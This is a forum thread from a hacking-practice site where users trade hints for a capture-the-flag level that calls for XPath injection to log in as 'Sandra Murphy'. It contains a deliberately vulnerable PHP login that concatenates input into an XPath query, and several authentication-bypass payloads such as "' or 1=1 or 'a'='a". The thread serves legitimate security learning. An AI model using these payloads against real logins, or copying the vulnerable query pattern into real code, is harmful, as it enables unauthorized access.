XPath injection requires a bit knowledge about XML schema and how XPath query works. Or I should say: Like the column name in SQLi, the element name in XPath injection is important as well.

Why are you going wrong? Because you focus on logical operators and forget the importance of element name(s), maybe. :p

This PHP example should be a bit help for this level:
```
/ Preparation stuff /
$doc = new DOMDocument;
$doc->preserveWhiteSpace = false;
$file = file_get_contents(“users.xml”); //users.xml contains users' data
$doc->loadXML($file);
/ End Preparation stuff /

/ XPath query /
$xpath = new DOMXPath($doc);

$username = “place_your_username_here”;
$password = “place_your_password_here”;
$query = “//user[username/text() = ‘” . $username . “’ and password/text() = ‘” . $password . “’]”;

$users = $xpath->query($query);
/ End XPath query /

/ Print /
foreach($users as $user) {
foreach($user->childNodes as $node) {
echo $node->nodeName.“ - ”.$node->nodeValue.“
”;
}
}
/ End Print /
```

users.xml
```
<?xml version=“1.0”?>

admin
5f4dcc3b5aa765d61d8327deb882cf99
Harry Potter

<user>  
    <username>user</username>  
    <password>202cb962ac59075b964b07152d234b70</password>  
    <realname>Gandalf</realname>  
</user>  

```

So from what I’ve been looking at for your example I would have to inject something along the lines of

string(//users[user/text()=‘’ or ‘1’ = ‘1’ and password/text()=‘’ or ‘1’ = ‘1’]/realname/text())

Yes. And don’t forget to be creative to login as Sandra Murphy. ;)

@TheShadowman your very close to the real injection !! Just work on the injection you posted first !! And the ususal “don’t over think it .” ??

Ok, thanks to both Freewind and IAmDevil, I’ll keep working on it :D

Thanks freewind for the assist. I was able to finish the level after having viewed the code. However, I must admit that it took me 63 attempts to figure out what the solution was. Rather embarrassing but still, relieved to have finished it.

This particular level helped me sharpen my concepts regarding sql injection. Now that I read the hint again, I realized that the hint is a BIG giveaway. Anyway, thanks for an awesome challenge. Love this site. :)

Try to apply a bit logic when injecting. Your code is non-sense.

ok i know i have to inject something like this >> Sandra' or 1=1 or ‘a’=‘a but i have been trying this but of no use

Of course it is no use because it is wrong.

ok but just tell am i in right path i know i have to use the real name but where

Yes you have the right username, and you have to put it in the ejection now!! ?

If the injection =

‘ or 1=1 or 'a’=‘a[/spoiler]

and

[spoiler]her real name = Sandra Murphy

then how would you combine the two in order to create a logical injection?

(Admin/Mod sidenote: I think i have hidden the answer well enough in my hint in this post but if this gives too much away, please delete this post, and apologies)

Credit goes to roun512 for explaining it this way to me which then eventually helped point me in a more logical direction. Because i did not come up with this way of hinting to it so dont thank me if this helps, thank roun512. :)

@fear-15: You may want to learn SQL injection first.

thnk u guys will take up ur advice

One point to all you potential hackers out there: Read what it says carefully: This login screen is trying something a bit different and is NOT using SQL. Try and login as the user whose real name is ‘Sandra Murphy’. Take your time over it and even though it is not using SQL reading up on SQL will help you to understand what you have to do and also help to pass the level. Good luck. :)

Guys, I would just like to share some hints, if possible :)

the thing is that you know you dont have ‘username’ and ‘password’, but you know the ‘realname’, can you write up a logical sequence such that if ‘realname’ is TRUE, the entire code still returns TRUE, though ‘username’ and ‘password’ both return FALSE.

That is a f**king big hint, isnt it :D :D

Hmm… I think making the injection script is the hard part where everyone gets confused.
Well if someone really read the hint real carefully the he will surely get it in one go.
The hint there by @Wallace- is just more than enough! ?

Everyone knows how to do a regular SQL injection, and it’s almost the same for Xpath but combining the realname within the injection is what stomps a lot of people.

don’t try to add to the end of the injection,change a part of the original injection itself to encompass the information you already know

I think this has been told , but just let me make it clear again !! In sql injection we inject something like :

username : blah' OR 1=1 OR ‘a’=‘a
and password : blah

Now , we have to use all the info that is given to us to make a logical injection for the level.
One more thing, though sql injection is much similar to XPATH Injection but sql query is different from XPATH query.
Keep this in mind and go for it !! Good luck :)

Now I think everyone should be able to complete this level based on the explanation provided by @Abhi_hacker

How many of ya’ll think @Abhi_hacker ’s hint was too much? ?
I vote to delete it! ?

its the combination of hints that is giving away too much :D :D

Should I delete it ?? I have tried to be as limited as possible but if you say so , I can delete it or edit it !!
Only they can interpret the hint who have read about sql injection and Xpath Query…..whereas for others(newbies) its still quite concealed……. But just tell me , if you want me to remove it !! :)

Hey Abhi_hacker, that is too close mate. You have given a too close hint it is more like the answer. Please either alter your post or remove it. It’s more or less the same a shadowman’s spoiler. Okay mate?? :)

Okk…I’ll just change it right away. No problem !!
Re : I have edited the post and removed the hint that was disclosing the answer……all that is left is a bit related to SQL( I think they should get at least that much ) and some general instructions regarding the level !!
Hope this doesn’t causes any further problems . :)

Yes mate no problem. Not all down to you as there are others just as much to blame in giving too much away for the level. Thanks for your action. :)

Ha its a lot better now. Only the spoiler was a bit too much. But it looks good now! :D

I’ve used this site: http://www.xpathtester.com/xpath

In this case:

<?xml version="1.0" encoding="UTF-8"?> <users> <user> <username>admin</username> <password>5f4dcc3b5aa765d61d8327deb882cf99</password> <realname>Harry Potter</realname> </user> <user> <username>user</username> <password>202cb962ac59075b964b07152d234b70</password> <realname>Gandalf</realname> </user> <user> <username>sandramurphyuser</username> <password>hardpass</password> <realname>Sandra Murphy</realname> </user> </users>

when I submit:

string(//user[realname='Sandra Murphy']/username/text())
returns: sandramurphyuser
and
string(//user[realname='Sandra Murphy']/password/text())
returns: hardpass

I’m in the right way? I need send the first in login and the second in the password?

Xpath injection = Sql + xpath query
There you just use xpath query

Based in this:

$query = "//user[username/text() = '" . $username . "' and password/text() = '" . $password . "']";

I tried this:

user: ' OR //user[realname/text() = 'Sandra Murphy']/username/text() OR ''=' pass: ' OR //user[realname/text() = 'Sandra Murphy']/password/text() OR ''='

$query = "//user[username/text() = '' OR //user[realname/text() = 'Sandra Murphy']/username/text() OR ''='' and password/text() = '' OR //user[realname/text() = 'Sandra Murphy']/password/text() OR ''='']";

But does’t work. I will study XPath harder…

Expanding on what @Wallace- said:
If we were doing an SQL injection we would use the following:

‘ or 1=1 or 'a’=‘a [/Spoiler]
And we need to trick it into using the real name and forgetting the username and password. And we know that…
[Spoiler] her realname='Sandra Murphy’

How could you insert her real name into the injection to make it = true for just her real name?

If you don’t overthink it and keep trying things you’ll get it eventually.

$query = "//user[username/text() = ' ' or 1=1 or 'a'='a' and password/text() = ' ' or 1=1 or 'a'='a'];

true and true, it works, but it connect in the first user? (not ‘Sandra Murphy)

The users data are stored like this:

<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema"> <xs:element name="users"> <xs:complexType> <xs:sequence> <xs:element name="user"> <xs:complexType> <xs:sequence> <xs:element type="xs:string" name="login">userlogin</xs:element> <xs:element type="xs:string" name="password">hardpassword</xs:element> <xs:element type="xs:string" name="realname">Sandra Muphy</xs:element> </xs:sequence> </xs:complexType> </xs:element> </xs:sequence> </xs:complexType> </xs:element> </xs:schema>

or like this:

<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema"> <xs:element name="users"> <xs:complexType> <xs:sequence> <xs:element name="user"> <xs:complexType> <xs:sequence> <xs:element type="xs:string" name="userlogin"/> <xs:element type="xs:string" name="hardpassword"/> <xs:element type="xs:string" name="Sandra Murphy"/> </xs:sequence> </xs:complexType> </xs:element> </xs:sequence> </xs:complexType> </xs:element> </xs:schema>

Perhaps you should study even more harder… For example, learn how to distinguish XML from XML schemas. You already posted usable XML example and a site to check your queries. This should be more than enough to figure out how to solve the challenge.

So as i have understand for username needs to use this code $query = "//user[username/text() = ' ' or 1=1 or 'a'='a' and for password this password/text() = ' ' or 1=1 or 'a'='a']; but must to connect in Sandra Murphy user ?

If you put “$query” in the field your syntax is wrong. In your query have nothing specified about Sandra Murphy, so the server will not guessing about it.

So base this <xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema"> <xs:element name="users"> <xs:complexType> <xs:sequence> <xs:element name="user"> <xs:complexType> <xs:sequence> <xs:element type="xs:string" name="login"/> <xs:element type="xs:string" name="password"/> <xs:element type="xs:string" name="realname"/> </xs:sequence> </xs:complexType> </xs:element> </xs:sequence> </xs:complexType> </xs:element> </xs:schema> i try instand of “$query” to put “login” login = "//user[username/text() = ' ' or 1=1 or 'a'='a' but also this is not the correct ansewer so … Plese give a hint.

@freewind1012 post a good example:

```/ Preparation stuff /
$doc = new DOMDocument;
$doc->preserveWhiteSpace = false;
$file = file_get_contents(“users.xml”); //users.xml contains users' data
$doc->loadXML($file);
/ End Preparation stuff /

/ XPath query /
$xpath = new DOMXPath($doc);

$username = “place_your_username_here”;
$password = “place_your_password_here”;
$query = “//user[username/text() = ‘” . $username. “’ and password/text() = ‘” . $password . “’]”;

$users = $xpath->query($query);
/ End XPath query /

/ Print /
foreach($users as $user) {
foreach($user->childNodes as $node) {
echo $node->nodeName.“ - ”.$node->nodeValue.“
”;
}
}
/ End Print /```

your input will be insert in $username and $password, this will be replaced in the query, and about the code that you post now:

[quote=dloser]Perhaps you should study even more harder… For example, learn how to distinguish XML from XML schemas. You already posted usable XML example and a site to check your queries. This should be more than enough to figure out how to solve the challenge.[/quote]

So for userename$username = "//user[username/text() = ' ' or 1=1 or 'a'='a' and for password password/text() = ' ' or 1=1 or 'a'='a']; but needs to login as “Sandra Murphy” …… ?

Try and login as the user whose real name is ‘Sandra Murphy’.

Here you are using username.
Do you think you have to use it ?

je me casse la tete a regarder partout mais j'y arrive pas a se niveau un petit coup de pouce silvouplait merci.

@dino84 Salut dino84 a tu fait de la recherche sur les injections xpath et a tu bien compris lalgorithme de bool, comprendre ces deux chose on fait que j'ai rssit ce niveau. La prochaine fois essaye de faire tes message sur les forums en anglais.
PS: [quote=HackThis.co.uk]This is an English only forum, please refrain from posting in other languages. We are working on adapting the site for your language. [/quote]

Traduction for english speakers:

hy dino84 did you do some research on xpath injections and have you understood boolean algorithme, understanding those 2 things helped me to finish this level.

Right and the code of @freewind1012 here is another help.

@dino84 What about reading the whole forum about this level?

Giveaway

Use this to test your xpath query - because you must user xpath query
[div]Simplest - hacker all user 1 by 1 - google position()=[/div]

Took me awhile to get this right..

Indeed all the hints is already on this forum. for further hints, i think you could think along the line on how you could achieve all true condition in SQL injection where you could insert comment to by pass the checks. it work for xpath. just that, this case the big hint with real user name is already given.

Am i anywhere near? My trial is along the lines of:

//elementA/elementAA[elementAAA[text()=‘whatWeKnow’]]/elementAAB

Yes or no question, there are many things i could be missing based on the forum, so i just wanted to be more oriented.

You’re way too much far, read the threads, you’ll learn almost step by step how it works :)

I wasn’t talking about the injection itself, but the xpath, it probabbly is different because it is a xml scheme instead of a.just xml, so i wanted to know if it worked the same, as for the xpath.

I have studied some things, and i am probabbly missing out, but what keeps getting me confused is the 1 = 1 or ‘a’ = ‘a’, it seems like something obvious to do for everybody, but why do you need to do it? i haven’t found a single piece of information that tells me what the 1=1 is for, is it just to make an statement inmmediately true?
As you can easily notice i know nothing about SQLI, so do not use that as an example. (unless you are recommending me to learn SQLI first)

I sent you a PM ;)

Everything I sent you as PM has already been said in previous threads :)

Crap i’m sorry! Thought I was in solution thread….

@heningto**: I hate to tell you, but your absolute first post is absolutely in the wrong place. Please remove the spoiler from the level board and post it in the solutions board.

Gotta say, freewind1012 had the perfect tip on this.

I’d give karma, but still too n00b on the site.

@freewind1012 was one of the greatest users of the website so sad that we haven’t seen him since 2014 :(